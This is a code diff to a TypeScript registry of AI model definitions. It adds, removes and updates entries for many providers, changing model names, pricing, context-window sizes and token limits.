"mistral.magistral-small-2509", + name: "Magistral Small 1.2", + api: "bedrock-converse-stream", + provider: "amazon-bedrock", + baseUrl: "https://bedrock-runtime.us-east-1.amazonaws.com", + reasoning: true, + input: ["text", "image"], + cost: { + input: 0.5, + output: 1.5, + cacheRead: 0, + cacheWrite: 0, + }, + contextWindow: 128000, + maxTokens: 40000, + } satisfies Model<"bedrock-converse-stream">, "mistral.ministral-3-14b-instruct": { id: "mistral.ministral-3-14b-instruct", name: "Ministral 14B 3.0", @@ -906,6 +855,23 @@ export const MODELS = { contextWindow: 128000, maxTokens: 4096, } satisfies Model<"bedrock-converse-stream">, + "mistral.ministral-3-3b-instruct": { + id: "mistral.ministral-3-3b-instruct", + name: "Ministral 3 3B", + api: 
"bedrock-converse-stream", + provider: "amazon-bedrock", + baseUrl: "https://bedrock-runtime.us-east-1.amazonaws.com", + reasoning: false, + input: ["text", "image"], + cost: { + input: 0.1, + output: 0.1, + cacheRead: 0, + cacheWrite: 0, + }, + contextWindow: 256000, + maxTokens: 8192, + } satisfies Model<"bedrock-converse-stream">, "mistral.ministral-3-8b-instruct": { id: "mistral.ministral-3-8b-instruct", name: "Ministral 3 8B", @@ -923,22 +889,39 @@ export const MODELS = { contextWindow: 128000, maxTokens: 4096, } satisfies Model<"bedrock-converse-stream">, - "mistral.mistral-large-2402-v1:0": { - id: "mistral.mistral-large-2402-v1:0", - name: "Mistral Large (24.02)", + "mistral.mistral-large-3-675b-instruct": { + id: "mistral.mistral-large-3-675b-instruct", + name: "Mistral Large 3", api: "bedrock-converse-stream", provider: "amazon-bedrock", baseUrl: "https://bedrock-runtime.us-east-1.amazonaws.com", reasoning: false, - input: ["text"], + input: ["text", "image"], cost: { input: 0.5, output: 1.5, cacheRead: 0, cacheWrite: 0, }, + contextWindow: 256000, + maxTokens: 8192, + } satisfies Model<"bedrock-converse-stream">, + "mistral.pixtral-large-2502-v1:0": { + id: "mistral.pixtral-large-2502-v1:0", + name: "Pixtral Large (25.02)", + api: "bedrock-converse-stream", + provider: "amazon-bedrock", + baseUrl: "https://bedrock-runtime.us-east-1.amazonaws.com", + reasoning: false, + input: ["text", "image"], + cost: { + input: 2, + output: 6, + cacheRead: 0, + cacheWrite: 0, + }, contextWindow: 128000, - maxTokens: 4096, + maxTokens: 8192, } satisfies Model<"bedrock-converse-stream">, "mistral.voxtral-mini-3b-2507": { id: "mistral.voxtral-mini-3b-2507", @@ -1025,6 +1008,23 @@ export const MODELS = { contextWindow: 128000, maxTokens: 4096, } satisfies Model<"bedrock-converse-stream">, + "nvidia.nemotron-nano-3-30b": { + id: "nvidia.nemotron-nano-3-30b", + name: "NVIDIA Nemotron Nano 3 30B", + api: "bedrock-converse-stream", + provider: "amazon-bedrock", + baseUrl: 
"https://bedrock-runtime.us-east-1.amazonaws.com", + reasoning: true, + input: ["text"], + cost: { + input: 0.06, + output: 0.24, + cacheRead: 0, + cacheWrite: 0, + }, + contextWindow: 128000, + maxTokens: 4096, + } satisfies Model<"bedrock-converse-stream">, "nvidia.nemotron-nano-9b-v2": { id: "nvidia.nemotron-nano-9b-v2", name: "NVIDIA Nemotron Nano 9B v2", @@ -1294,7 +1294,7 @@ export const MODELS = { cacheRead: 0.5, cacheWrite: 6.25, }, - contextWindow: 200000, + contextWindow: 1000000, maxTokens: 128000, } satisfies Model<"bedrock-converse-stream">, "us.anthropic.claude-sonnet-4-20250514-v1:0": { @@ -1345,7 +1345,7 @@ export const MODELS = { cacheRead: 0.3, cacheWrite: 3.75, }, - contextWindow: 200000, + contextWindow: 1000000, maxTokens: 64000, } satisfies Model<"bedrock-converse-stream">, "writer.palmyra-x4-v1:0": { @@ -1721,23 +1721,6 @@ export const MODELS = { cacheRead: 0.5, cacheWrite: 6.25, }, - contextWindow: 200000, - maxTokens: 128000, - } satisfies Model<"anthropic-messages">, - "claude-opus-4-6[1m]": { - id: "claude-opus-4-6[1m]", - name: "Claude Opus 4.6 (1M)", - api: "anthropic-messages", - provider: "anthropic", - baseUrl: "https://api.anthropic.com", - reasoning: true, - input: ["text", "image"], - cost: { - input: 5, - output: 25, - cacheRead: 0.5, - cacheWrite: 6.25, - }, contextWindow: 1000000, maxTokens: 128000, } satisfies Model<"anthropic-messages">, @@ -1823,182 +1806,10 @@ export const MODELS = { cacheRead: 0.3, cacheWrite: 3.75, }, - contextWindow: 200000, + contextWindow: 1000000, maxTokens: 64000, } satisfies Model<"anthropic-messages">, }, - "anthropic-vertex": { - "claude-opus-4-6": { - id: "claude-opus-4-6", - name: "Claude Opus 4.6 (Vertex)", - api: "anthropic-vertex", - provider: "anthropic-vertex", - baseUrl: "https://us-central1-aiplatform.googleapis.com", - reasoning: true, - input: ["text", "image"], - cost: { - input: 15, - output: 75, - cacheRead: 1.5, - cacheWrite: 18.75, - }, - contextWindow: 200000, - maxTokens: 128000, 
- } satisfies Model<"anthropic-vertex">, - "claude-opus-4-6[1m]": { - id: "claude-opus-4-6[1m]", - name: "Claude Opus 4.6 1M (Vertex)", - api: "anthropic-vertex", - provider: "anthropic-vertex", - baseUrl: "https://us-central1-aiplatform.googleapis.com", - reasoning: true, - input: ["text", "image"], - cost: { - input: 15, - output: 75, - cacheRead: 1.5, - cacheWrite: 18.75, - }, - contextWindow: 1000000, - maxTokens: 128000, - } satisfies Model<"anthropic-vertex">, - "claude-sonnet-4-6": { - id: "claude-sonnet-4-6", - name: "Claude Sonnet 4.6 (Vertex)", - api: "anthropic-vertex", - provider: "anthropic-vertex", - baseUrl: "https://us-central1-aiplatform.googleapis.com", - reasoning: true, - input: ["text", "image"], - cost: { - input: 3, - output: 15, - cacheRead: 0.3, - cacheWrite: 3.75, - }, - contextWindow: 200000, - maxTokens: 64000, - } satisfies Model<"anthropic-vertex">, - "claude-sonnet-4-6[1m]": { - id: "claude-sonnet-4-6[1m]", - name: "Claude Sonnet 4.6 1M (Vertex)", - api: "anthropic-vertex", - provider: "anthropic-vertex", - baseUrl: "https://us-central1-aiplatform.googleapis.com", - reasoning: true, - input: ["text", "image"], - cost: { - input: 3, - output: 15, - cacheRead: 0.3, - cacheWrite: 3.75, - }, - contextWindow: 1000000, - maxTokens: 64000, - } satisfies Model<"anthropic-vertex">, - "claude-sonnet-4-5@20250929": { - id: "claude-sonnet-4-5@20250929", - name: "Claude Sonnet 4.5 (Vertex)", - api: "anthropic-vertex", - provider: "anthropic-vertex", - baseUrl: "https://us-central1-aiplatform.googleapis.com", - reasoning: true, - input: ["text", "image"], - cost: { - input: 3, - output: 15, - cacheRead: 0.3, - cacheWrite: 3.75, - }, - contextWindow: 200000, - maxTokens: 64000, - } satisfies Model<"anthropic-vertex">, - "claude-sonnet-4@20250514": { - id: "claude-sonnet-4@20250514", - name: "Claude Sonnet 4 (Vertex)", - api: "anthropic-vertex", - provider: "anthropic-vertex", - baseUrl: "https://us-central1-aiplatform.googleapis.com", - reasoning: 
true, - input: ["text", "image"], - cost: { - input: 3, - output: 15, - cacheRead: 0.3, - cacheWrite: 3.75, - }, - contextWindow: 200000, - maxTokens: 64000, - } satisfies Model<"anthropic-vertex">, - "claude-opus-4-5@20251101": { - id: "claude-opus-4-5@20251101", - name: "Claude Opus 4.5 (Vertex)", - api: "anthropic-vertex", - provider: "anthropic-vertex", - baseUrl: "https://us-central1-aiplatform.googleapis.com", - reasoning: true, - input: ["text", "image"], - cost: { - input: 15, - output: 75, - cacheRead: 1.5, - cacheWrite: 18.75, - }, - contextWindow: 200000, - maxTokens: 32000, - } satisfies Model<"anthropic-vertex">, - "claude-opus-4-1@20250805": { - id: "claude-opus-4-1@20250805", - name: "Claude Opus 4.1 (Vertex)", - api: "anthropic-vertex", - provider: "anthropic-vertex", - baseUrl: "https://us-central1-aiplatform.googleapis.com", - reasoning: true, - input: ["text", "image"], - cost: { - input: 15, - output: 75, - cacheRead: 1.5, - cacheWrite: 18.75, - }, - contextWindow: 200000, - maxTokens: 32000, - } satisfies Model<"anthropic-vertex">, - "claude-opus-4@20250514": { - id: "claude-opus-4@20250514", - name: "Claude Opus 4 (Vertex)", - api: "anthropic-vertex", - provider: "anthropic-vertex", - baseUrl: "https://us-central1-aiplatform.googleapis.com", - reasoning: true, - input: ["text", "image"], - cost: { - input: 15, - output: 75, - cacheRead: 1.5, - cacheWrite: 18.75, - }, - contextWindow: 200000, - maxTokens: 32000, - } satisfies Model<"anthropic-vertex">, - "claude-haiku-4-5@20251001": { - id: "claude-haiku-4-5@20251001", - name: "Claude Haiku 4.5 (Vertex)", - api: "anthropic-vertex", - provider: "anthropic-vertex", - baseUrl: "https://us-central1-aiplatform.googleapis.com", - reasoning: false, - input: ["text", "image"], - cost: { - input: 0.8, - output: 4, - cacheRead: 0.08, - cacheWrite: 1, - }, - contextWindow: 200000, - maxTokens: 8192, - } satisfies Model<"anthropic-vertex">, - }, "azure-openai-responses": { "codex-mini-latest": { id: 
"codex-mini-latest", @@ -2493,6 +2304,40 @@ export const MODELS = { contextWindow: 272000, maxTokens: 128000, } satisfies Model<"azure-openai-responses">, + "gpt-5.4-mini": { + id: "gpt-5.4-mini", + name: "GPT-5.4 mini", + api: "azure-openai-responses", + provider: "azure-openai-responses", + baseUrl: "", + reasoning: true, + input: ["text", "image"], + cost: { + input: 0.75, + output: 4.5, + cacheRead: 0.075, + cacheWrite: 0, + }, + contextWindow: 400000, + maxTokens: 128000, + } satisfies Model<"azure-openai-responses">, + "gpt-5.4-nano": { + id: "gpt-5.4-nano", + name: "GPT-5.4 nano", + api: "azure-openai-responses", + provider: "azure-openai-responses", + baseUrl: "", + reasoning: true, + input: ["text", "image"], + cost: { + input: 0.2, + output: 1.25, + cacheRead: 0.02, + cacheWrite: 0, + }, + contextWindow: 400000, + maxTokens: 128000, + } satisfies Model<"azure-openai-responses">, "gpt-5.4-pro": { id: "gpt-5.4-pro", name: "GPT-5.4 Pro", @@ -2733,7 +2578,7 @@ export const MODELS = { cacheRead: 0, cacheWrite: 0, }, - contextWindow: 128000, + contextWindow: 144000, maxTokens: 32000, } satisfies Model<"anthropic-messages">, "claude-opus-4.5": { @@ -2751,7 +2596,7 @@ export const MODELS = { cacheRead: 0, cacheWrite: 0, }, - contextWindow: 128000, + contextWindow: 160000, maxTokens: 32000, } satisfies Model<"anthropic-messages">, "claude-opus-4.6": { @@ -2769,7 +2614,7 @@ export const MODELS = { cacheRead: 0, cacheWrite: 0, }, - contextWindow: 128000, + contextWindow: 144000, maxTokens: 64000, } satisfies Model<"anthropic-messages">, "claude-sonnet-4": { @@ -2787,7 +2632,7 @@ export const MODELS = { cacheRead: 0, cacheWrite: 0, }, - contextWindow: 128000, + contextWindow: 216000, maxTokens: 16000, } satisfies Model<"anthropic-messages">, "claude-sonnet-4.5": { @@ -2805,7 +2650,7 @@ export const MODELS = { cacheRead: 0, cacheWrite: 0, }, - contextWindow: 128000, + contextWindow: 144000, maxTokens: 32000, } satisfies Model<"anthropic-messages">, 
"claude-sonnet-4.6": { @@ -2823,7 +2668,7 @@ export const MODELS = { cacheRead: 0, cacheWrite: 0, }, - contextWindow: 128000, + contextWindow: 200000, maxTokens: 32000, } satisfies Model<"anthropic-messages">, "gemini-2.5-pro": { @@ -2918,7 +2763,7 @@ export const MODELS = { cacheRead: 0, cacheWrite: 0, }, - contextWindow: 64000, + contextWindow: 128000, maxTokens: 16384, } satisfies Model<"openai-completions">, "gpt-4o": { @@ -2937,8 +2782,8 @@ export const MODELS = { cacheRead: 0, cacheWrite: 0, }, - contextWindow: 64000, - maxTokens: 16384, + contextWindow: 128000, + maxTokens: 4096, } satisfies Model<"openai-completions">, "gpt-5": { id: "gpt-5", @@ -2973,7 +2818,7 @@ export const MODELS = { cacheRead: 0, cacheWrite: 0, }, - contextWindow: 128000, + contextWindow: 264000, maxTokens: 64000, } satisfies Model<"openai-responses">, "gpt-5.1": { @@ -2991,7 +2836,7 @@ export const MODELS = { cacheRead: 0, cacheWrite: 0, }, - contextWindow: 128000, + contextWindow: 264000, maxTokens: 64000, } satisfies Model<"openai-responses">, "gpt-5.1-codex": { @@ -3009,7 +2854,7 @@ export const MODELS = { cacheRead: 0, cacheWrite: 0, }, - contextWindow: 128000, + contextWindow: 400000, maxTokens: 128000, } satisfies Model<"openai-responses">, "gpt-5.1-codex-max": { @@ -3027,7 +2872,7 @@ export const MODELS = { cacheRead: 0, cacheWrite: 0, }, - contextWindow: 128000, + contextWindow: 400000, maxTokens: 128000, } satisfies Model<"openai-responses">, "gpt-5.1-codex-mini": { @@ -3045,7 +2890,7 @@ export const MODELS = { cacheRead: 0, cacheWrite: 0, }, - contextWindow: 128000, + contextWindow: 400000, maxTokens: 128000, } satisfies Model<"openai-responses">, "gpt-5.2": { @@ -3063,7 +2908,7 @@ export const MODELS = { cacheRead: 0, cacheWrite: 0, }, - contextWindow: 128000, + contextWindow: 264000, maxTokens: 64000, } satisfies Model<"openai-responses">, "gpt-5.2-codex": { @@ -3081,7 +2926,7 @@ export const MODELS = { cacheRead: 0, cacheWrite: 0, }, - contextWindow: 272000, + 
contextWindow: 400000, maxTokens: 128000, } satisfies Model<"openai-responses">, "gpt-5.3-codex": { @@ -3120,6 +2965,24 @@ export const MODELS = { contextWindow: 400000, maxTokens: 128000, } satisfies Model<"openai-responses">, + "gpt-5.4-mini": { + id: "gpt-5.4-mini", + name: "GPT-5.4 mini", + api: "openai-responses", + provider: "github-copilot", + baseUrl: "https://api.individual.githubcopilot.com", + headers: {"User-Agent":"GitHubCopilotChat/0.35.0","Editor-Version":"vscode/1.107.0","Editor-Plugin-Version":"copilot-chat/0.35.0","Copilot-Integration-Id":"vscode-chat"}, + reasoning: true, + input: ["text", "image"], + cost: { + input: 0, + output: 0, + cacheRead: 0, + cacheWrite: 0, + }, + contextWindow: 400000, + maxTokens: 128000, + } satisfies Model<"openai-responses">, "grok-code-fast-1": { id: "grok-code-fast-1", name: "Grok Code Fast 1", @@ -3439,10 +3302,10 @@ export const MODELS = { reasoning: true, input: ["text", "image"], cost: { - input: 0, - output: 0, - cacheRead: 0, - cacheWrite: 0, + input: 0.25, + output: 1.5, + cacheRead: 0.025, + cacheWrite: 1, }, contextWindow: 1048576, maxTokens: 65536, @@ -4703,6 +4566,40 @@ export const MODELS = { contextWindow: 204800, maxTokens: 131072, } satisfies Model<"anthropic-messages">, + "MiniMax-M2.7": { + id: "MiniMax-M2.7", + name: "MiniMax-M2.7", + api: "anthropic-messages", + provider: "minimax", + baseUrl: "https://api.minimax.io/anthropic", + reasoning: true, + input: ["text"], + cost: { + input: 0.3, + output: 1.2, + cacheRead: 0.06, + cacheWrite: 0.375, + }, + contextWindow: 204800, + maxTokens: 131072, + } satisfies Model<"anthropic-messages">, + "MiniMax-M2.7-highspeed": { + id: "MiniMax-M2.7-highspeed", + name: "MiniMax-M2.7-highspeed", + api: "anthropic-messages", + provider: "minimax", + baseUrl: "https://api.minimax.io/anthropic", + reasoning: true, + input: ["text"], + cost: { + input: 0.6, + output: 2.4, + cacheRead: 0.06, + cacheWrite: 0.375, + }, + contextWindow: 204800, + maxTokens: 131072, + } 
satisfies Model<"anthropic-messages">, }, "minimax-cn": { "MiniMax-M2": { @@ -4773,11 +4670,45 @@ export const MODELS = { contextWindow: 204800, maxTokens: 131072, } satisfies Model<"anthropic-messages">, + "MiniMax-M2.7": { + id: "MiniMax-M2.7", + name: "MiniMax-M2.7", + api: "anthropic-messages", + provider: "minimax-cn", + baseUrl: "https://api.minimaxi.com/anthropic", + reasoning: true, + input: ["text"], + cost: { + input: 0.3, + output: 1.2, + cacheRead: 0.06, + cacheWrite: 0.375, + }, + contextWindow: 204800, + maxTokens: 131072, + } satisfies Model<"anthropic-messages">, + "MiniMax-M2.7-highspeed": { + id: "MiniMax-M2.7-highspeed", + name: "MiniMax-M2.7-highspeed", + api: "anthropic-messages", + provider: "minimax-cn", + baseUrl: "https://api.minimaxi.com/anthropic", + reasoning: true, + input: ["text"], + cost: { + input: 0.6, + output: 2.4, + cacheRead: 0.06, + cacheWrite: 0.375, + }, + contextWindow: 204800, + maxTokens: 131072, + } satisfies Model<"anthropic-messages">, }, "mistral": { "codestral-latest": { id: "codestral-latest", - name: "Codestral", + name: "Codestral (latest)", api: "mistral-conversations", provider: "mistral", baseUrl: "https://api.mistral.ai", @@ -4828,7 +4759,7 @@ export const MODELS = { } satisfies Model<"mistral-conversations">, "devstral-medium-latest": { id: "devstral-medium-latest", - name: "Devstral 2", + name: "Devstral 2 (latest)", api: "mistral-conversations", provider: "mistral", baseUrl: "https://api.mistral.ai", @@ -4896,7 +4827,7 @@ export const MODELS = { } satisfies Model<"mistral-conversations">, "magistral-medium-latest": { id: "magistral-medium-latest", - name: "Magistral Medium", + name: "Magistral Medium (latest)", api: "mistral-conversations", provider: "mistral", baseUrl: "https://api.mistral.ai", @@ -4930,7 +4861,7 @@ export const MODELS = { } satisfies Model<"mistral-conversations">, "ministral-3b-latest": { id: "ministral-3b-latest", - name: "Ministral 3B", + name: "Ministral 3B (latest)", api: 
"mistral-conversations", provider: "mistral", baseUrl: "https://api.mistral.ai", @@ -4947,7 +4878,7 @@ export const MODELS = { } satisfies Model<"mistral-conversations">, "ministral-8b-latest": { id: "ministral-8b-latest", - name: "Ministral 8B", + name: "Ministral 8B (latest)", api: "mistral-conversations", provider: "mistral", baseUrl: "https://api.mistral.ai", @@ -4998,7 +4929,7 @@ export const MODELS = { } satisfies Model<"mistral-conversations">, "mistral-large-latest": { id: "mistral-large-latest", - name: "Mistral Large", + name: "Mistral Large (latest)", api: "mistral-conversations", provider: "mistral", baseUrl: "https://api.mistral.ai", @@ -5049,7 +4980,7 @@ export const MODELS = { } satisfies Model<"mistral-conversations">, "mistral-medium-latest": { id: "mistral-medium-latest", - name: "Mistral Medium", + name: "Mistral Medium (latest)", api: "mistral-conversations", provider: "mistral", baseUrl: "https://api.mistral.ai", @@ -5100,7 +5031,7 @@ export const MODELS = { } satisfies Model<"mistral-conversations">, "mistral-small-latest": { id: "mistral-small-latest", - name: "Mistral Small", + name: "Mistral Small (latest)", api: "mistral-conversations", provider: "mistral", baseUrl: "https://api.mistral.ai", @@ -5185,7 +5116,7 @@ export const MODELS = { } satisfies Model<"mistral-conversations">, "pixtral-large-latest": { id: "pixtral-large-latest", - name: "Pixtral Large", + name: "Pixtral Large (latest)", api: "mistral-conversations", provider: "mistral", baseUrl: "https://api.mistral.ai", @@ -5695,6 +5626,40 @@ export const MODELS = { contextWindow: 272000, maxTokens: 128000, } satisfies Model<"openai-responses">, + "gpt-5.4-mini": { + id: "gpt-5.4-mini", + name: "GPT-5.4 mini", + api: "openai-responses", + provider: "openai", + baseUrl: "https://api.openai.com/v1", + reasoning: true, + input: ["text", "image"], + cost: { + input: 0.75, + output: 4.5, + cacheRead: 0.075, + cacheWrite: 0, + }, + contextWindow: 400000, + maxTokens: 128000, + } satisfies 
Model<"openai-responses">, + "gpt-5.4-nano": { + id: "gpt-5.4-nano", + name: "GPT-5.4 nano", + api: "openai-responses", + provider: "openai", + baseUrl: "https://api.openai.com/v1", + reasoning: true, + input: ["text", "image"], + cost: { + input: 0.2, + output: 1.25, + cacheRead: 0.02, + cacheWrite: 0, + }, + contextWindow: 400000, + maxTokens: 128000, + } satisfies Model<"openai-responses">, "gpt-5.4-pro": { id: "gpt-5.4-pro", name: "GPT-5.4 Pro", @@ -6087,7 +6052,7 @@ export const MODELS = { cacheRead: 0.5, cacheWrite: 6.25, }, - contextWindow: 200000, + contextWindow: 1000000, maxTokens: 128000, } satisfies Model<"anthropic-messages">, "claude-sonnet-4": { @@ -6158,23 +6123,6 @@ export const MODELS = { contextWindow: 1048576, maxTokens: 65536, } satisfies Model<"google-generative-ai">, - "gemini-3-pro": { - id: "gemini-3-pro", - name: "Gemini 3 Pro", - api: "google-generative-ai", - provider: "opencode", - baseUrl: "https://opencode.ai/zen/v1", - reasoning: true, - input: ["text", "image"], - cost: { - input: 2, - output: 12, - cacheRead: 0.2, - cacheWrite: 0, - }, - contextWindow: 1048576, - maxTokens: 65536, - } satisfies Model<"google-generative-ai">, "gemini-3.1-pro": { id: "gemini-3.1-pro", name: "Gemini 3.1 Pro Preview", @@ -6192,40 +6140,6 @@ export const MODELS = { contextWindow: 1048576, maxTokens: 65536, } satisfies Model<"google-generative-ai">, - "glm-4.6": { - id: "glm-4.6", - name: "GLM-4.6", - api: "openai-completions", - provider: "opencode", - baseUrl: "https://opencode.ai/zen/v1", - reasoning: true, - input: ["text"], - cost: { - input: 0.6, - output: 2.2, - cacheRead: 0.1, - cacheWrite: 0, - }, - contextWindow: 204800, - maxTokens: 131072, - } satisfies Model<"openai-completions">, - "glm-4.7": { - id: "glm-4.7", - name: "GLM-4.7", - api: "openai-completions", - provider: "opencode", - baseUrl: "https://opencode.ai/zen/v1", - reasoning: true, - input: ["text"], - cost: { - input: 0.6, - output: 2.2, - cacheRead: 0.1, - cacheWrite: 0, - }, - 
contextWindow: 204800, - maxTokens: 131072, - } satisfies Model<"openai-completions">, "glm-5": { id: "glm-5", name: "GLM-5", @@ -6430,6 +6344,40 @@ export const MODELS = { contextWindow: 272000, maxTokens: 128000, } satisfies Model<"openai-responses">, + "gpt-5.4-mini": { + id: "gpt-5.4-mini", + name: "GPT-5.4 Mini", + api: "openai-responses", + provider: "opencode", + baseUrl: "https://opencode.ai/zen/v1", + reasoning: true, + input: ["text", "image"], + cost: { + input: 0.75, + output: 4.5, + cacheRead: 0.075, + cacheWrite: 0, + }, + contextWindow: 400000, + maxTokens: 128000, + } satisfies Model<"openai-responses">, + "gpt-5.4-nano": { + id: "gpt-5.4-nano", + name: "GPT-5.4 Nano", + api: "openai-responses", + provider: "opencode", + baseUrl: "https://opencode.ai/zen/v1", + reasoning: true, + input: ["text", "image"], + cost: { + input: 0.2, + output: 1.25, + cacheRead: 0.02, + cacheWrite: 0, + }, + contextWindow: 400000, + maxTokens: 128000, + } satisfies Model<"openai-responses">, "gpt-5.4-pro": { id: "gpt-5.4-pro", name: "GPT-5.4 Pro", @@ -6464,22 +6412,39 @@ export const MODELS = { contextWindow: 262144, maxTokens: 65536, } satisfies Model<"openai-completions">, - "minimax-m2.1": { - id: "minimax-m2.1", - name: "MiniMax M2.1", + "mimo-v2-omni-free": { + id: "mimo-v2-omni-free", + name: "MiMo V2 Omni Free", + api: "openai-completions", + provider: "opencode", + baseUrl: "https://opencode.ai/zen/v1", + reasoning: true, + input: ["text", "image"], + cost: { + input: 0, + output: 0, + cacheRead: 0, + cacheWrite: 0, + }, + contextWindow: 262144, + maxTokens: 64000, + } satisfies Model<"openai-completions">, + "mimo-v2-pro-free": { + id: "mimo-v2-pro-free", + name: "MiMo V2 Pro Free", api: "openai-completions", provider: "opencode", baseUrl: "https://opencode.ai/zen/v1", reasoning: true, input: ["text"], cost: { - input: 0.3, - output: 1.2, - cacheRead: 0.1, + input: 0, + output: 0, + cacheRead: 0, cacheWrite: 0, }, - contextWindow: 204800, - maxTokens: 131072, + 
contextWindow: 1048576, + maxTokens: 64000, } satisfies Model<"openai-completions">, "minimax-m2.5": { id: "minimax-m2.5", @@ -6515,6 +6480,23 @@ export const MODELS = { contextWindow: 204800, maxTokens: 131072, } satisfies Model<"anthropic-messages">, + "nemotron-3-super-free": { + id: "nemotron-3-super-free", + name: "Nemotron 3 Super Free", + api: "openai-completions", + provider: "opencode", + baseUrl: "https://opencode.ai/zen/v1", + reasoning: true, + input: ["text"], + cost: { + input: 0, + output: 0, + cacheRead: 0, + cacheWrite: 0, + }, + contextWindow: 1000000, + maxTokens: 128000, + } satisfies Model<"openai-completions">, }, "opencode-go": { "glm-5": { @@ -6568,6 +6550,23 @@ export const MODELS = { contextWindow: 204800, maxTokens: 131072, } satisfies Model<"anthropic-messages">, + "minimax-m2.7": { + id: "minimax-m2.7", + name: "MiniMax M2.7", + api: "anthropic-messages", + provider: "opencode-go", + baseUrl: "https://opencode.ai/zen/go", + reasoning: true, + input: ["text"], + cost: { + input: 0.3, + output: 1.2, + cacheRead: 0.06, + cacheWrite: 0, + }, + contextWindow: 204800, + maxTokens: 131072, + } satisfies Model<"anthropic-messages">, }, "openrouter": { "ai21/jamba-large-1.7": { @@ -7080,6 +7079,23 @@ export const MODELS = { contextWindow: 262144, maxTokens: 32768, } satisfies Model<"openai-completions">, + "bytedance-seed/seed-2.0-lite": { + id: "bytedance-seed/seed-2.0-lite", + name: "ByteDance Seed: Seed-2.0-Lite", + api: "openai-completions", + provider: "openrouter", + baseUrl: "https://openrouter.ai/api/v1", + reasoning: true, + input: ["text", "image"], + cost: { + input: 0.25, + output: 2, + cacheRead: 0, + cacheWrite: 0, + }, + contextWindow: 262144, + maxTokens: 131072, + } satisfies Model<"openai-completions">, "bytedance-seed/seed-2.0-mini": { id: "bytedance-seed/seed-2.0-mini", name: "ByteDance Seed: Seed-2.0-Mini", @@ -7159,11 +7175,11 @@ export const MODELS = { cost: { input: 0.19999999999999998, output: 0.77, - cacheRead: 0.13, + 
cacheRead: 0.135, cacheWrite: 0, }, contextWindow: 163840, - maxTokens: 163840, + maxTokens: 4096, } satisfies Model<"openai-completions">, "deepseek/deepseek-chat-v3.1": { id: "deepseek/deepseek-chat-v3.1", @@ -7233,23 +7249,6 @@ export const MODELS = { contextWindow: 163840, maxTokens: 4096, } satisfies Model<"openai-completions">, - "deepseek/deepseek-v3.1-terminus:exacto": { - id: "deepseek/deepseek-v3.1-terminus:exacto", - name: "DeepSeek: DeepSeek V3.1 Terminus (exacto)", - api: "openai-completions", - provider: "openrouter", - baseUrl: "https://openrouter.ai/api/v1", - reasoning: true, - input: ["text"], - cost: { - input: 0.21, - output: 0.7899999999999999, - cacheRead: 0.16799999999999998, - cacheWrite: 0, - }, - contextWindow: 163840, - maxTokens: 4096, - } satisfies Model<"openai-completions">, "deepseek/deepseek-v3.2": { id: "deepseek/deepseek-v3.2", name: "DeepSeek: DeepSeek V3.2", @@ -7259,13 +7258,13 @@ export const MODELS = { reasoning: true, input: ["text"], cost: { - input: 0.25, - output: 0.39999999999999997, - cacheRead: 0, + input: 0.26, + output: 0.38, + cacheRead: 0.13, cacheWrite: 0, }, contextWindow: 163840, - maxTokens: 65536, + maxTokens: 4096, } satisfies Model<"openai-completions">, "deepseek/deepseek-v3.2-exp": { id: "deepseek/deepseek-v3.2-exp", @@ -7522,40 +7521,6 @@ export const MODELS = { contextWindow: 1048576, maxTokens: 65536, } satisfies Model<"openai-completions">, - "google/gemma-3-27b-it": { - id: "google/gemma-3-27b-it", - name: "Google: Gemma 3 27B", - api: "openai-completions", - provider: "openrouter", - baseUrl: "https://openrouter.ai/api/v1", - reasoning: false, - input: ["text", "image"], - cost: { - input: 0.04, - output: 0.15, - cacheRead: 0.02, - cacheWrite: 0, - }, - contextWindow: 128000, - maxTokens: 65536, - } satisfies Model<"openai-completions">, - "google/gemma-3-27b-it:free": { - id: "google/gemma-3-27b-it:free", - name: "Google: Gemma 3 27B (free)", - api: "openai-completions", - provider: "openrouter", - 
baseUrl: "https://openrouter.ai/api/v1", - reasoning: false, - input: ["text", "image"], - cost: { - input: 0, - output: 0, - cacheRead: 0, - cacheWrite: 0, - }, - contextWindow: 131072, - maxTokens: 8192, - } satisfies Model<"openai-completions">, "inception/mercury": { id: "inception/mercury", name: "Inception: Mercury", @@ -7658,23 +7623,6 @@ export const MODELS = { contextWindow: 8192, maxTokens: 16384, } satisfies Model<"openai-completions">, - "meta-llama/llama-3.1-405b-instruct": { - id: "meta-llama/llama-3.1-405b-instruct", - name: "Meta: Llama 3.1 405B Instruct", - api: "openai-completions", - provider: "openrouter", - baseUrl: "https://openrouter.ai/api/v1", - reasoning: false, - input: ["text"], - cost: { - input: 4, - output: 4, - cacheRead: 0, - cacheWrite: 0, - }, - contextWindow: 131000, - maxTokens: 4096, - } satisfies Model<"openai-completions">, "meta-llama/llama-3.1-70b-instruct": { id: "meta-llama/llama-3.1-70b-instruct", name: "Meta: Llama 3.1 70B Instruct", @@ -7740,8 +7688,8 @@ export const MODELS = { cacheRead: 0, cacheWrite: 0, }, - contextWindow: 128000, - maxTokens: 128000, + contextWindow: 65536, + maxTokens: 4096, } satisfies Model<"openai-completions">, "meta-llama/llama-4-maverick": { id: "meta-llama/llama-4-maverick", @@ -7837,14 +7785,48 @@ export const MODELS = { reasoning: true, input: ["text"], cost: { - input: 0.295, - output: 1.2, - cacheRead: 0.03, + input: 0.19999999999999998, + output: 1.17, + cacheRead: 0.09999999999999999, + cacheWrite: 0, + }, + contextWindow: 196608, + maxTokens: 65536, + } satisfies Model<"openai-completions">, + "minimax/minimax-m2.5:free": { + id: "minimax/minimax-m2.5:free", + name: "MiniMax: MiniMax M2.5 (free)", + api: "openai-completions", + provider: "openrouter", + baseUrl: "https://openrouter.ai/api/v1", + reasoning: true, + input: ["text"], + cost: { + input: 0, + output: 0, + cacheRead: 0, cacheWrite: 0, }, contextWindow: 196608, maxTokens: 196608, } satisfies Model<"openai-completions">, + 
